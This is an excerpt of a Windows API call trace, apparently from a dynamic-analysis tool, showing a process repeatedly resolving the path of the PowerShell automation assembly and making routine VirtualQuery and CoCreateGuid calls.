	[0353.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.727] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x276bd87c, Data2=0xa4d3, Data3=0x458a, Data4=([0]=0x8d, [1]=0x6, [2]=0x58, [3]=0xfe, [4]=0xc7, [5]=0xac, [6]=0x57, [7]=0x56))) returned 0x0
	[0353.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.731] VirtualQuery (in: lpAddress=0x10b0c0, lpBuffer=0x10bf80, dwLength=0x30 | out: lpBuffer=0x10bf80*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.732] VirtualQuery (in: lpAddress=0x10b150, lpBuffer=0x10c010, dwLength=0x30 | out: lpBuffer=0x10c010*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.801] VirtualQuery (in: lpAddress=0x10b8d0, lpBuffer=0x10c790, dwLength=0x30 | out: lpBuffer=0x10c790*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.802] VirtualQuery (in: lpAddress=0x10b8d0, lpBuffer=0x10c790, dwLength=0x30 | out: lpBuffer=0x10c790*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.804] VirtualQuery (in: lpAddress=0x10b8d0, lpBuffer=0x10c790, dwLength=0x30 | out: lpBuffer=0x10c790*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.804] VirtualQuery (in: lpAddress=0x10b830, lpBuffer=0x10c6f0, dwLength=0x30 | out: lpBuffer=0x10c6f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.804] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.804] VirtualQuery (in: lpAddress=0x10b830, lpBuffer=0x10c6f0, dwLength=0x30 | out: lpBuffer=0x10c6f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.804] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.804] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.804] VirtualQuery (in: lpAddress=0x10b830, lpBuffer=0x10c6f0, dwLength=0x30 | out: lpBuffer=0x10c6f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.805] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.805] VirtualQuery (in: lpAddress=0x10b830, lpBuffer=0x10c6f0, dwLength=0x30 | out: lpBuffer=0x10c6f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.805] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.805] VirtualQuery (in: lpAddress=0x10b830, lpBuffer=0x10c6f0, dwLength=0x30 | out: lpBuffer=0x10c6f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.805] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.805] VirtualQuery (in: lpAddress=0x10b500, lpBuffer=0x10c3c0, dwLength=0x30 | out: lpBuffer=0x10c3c0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.805] VirtualQuery (in: lpAddress=0x10b830, lpBuffer=0x10c6f0, dwLength=0x30 | out: lpBuffer=0x10c6f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.805] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.806] VirtualQuery (in: lpAddress=0x10b830, lpBuffer=0x10c6f0, dwLength=0x30 | out: lpBuffer=0x10c6f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.806] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.806] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x6d73d139, Data2=0xf901, Data3=0x4b10, Data4=([0]=0xa2, [1]=0xbf, [2]=0xee, [3]=0xca, [4]=0x9b, [5]=0x64, [6]=0x37, [7]=0x33))) returned 0x0
	[0353.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
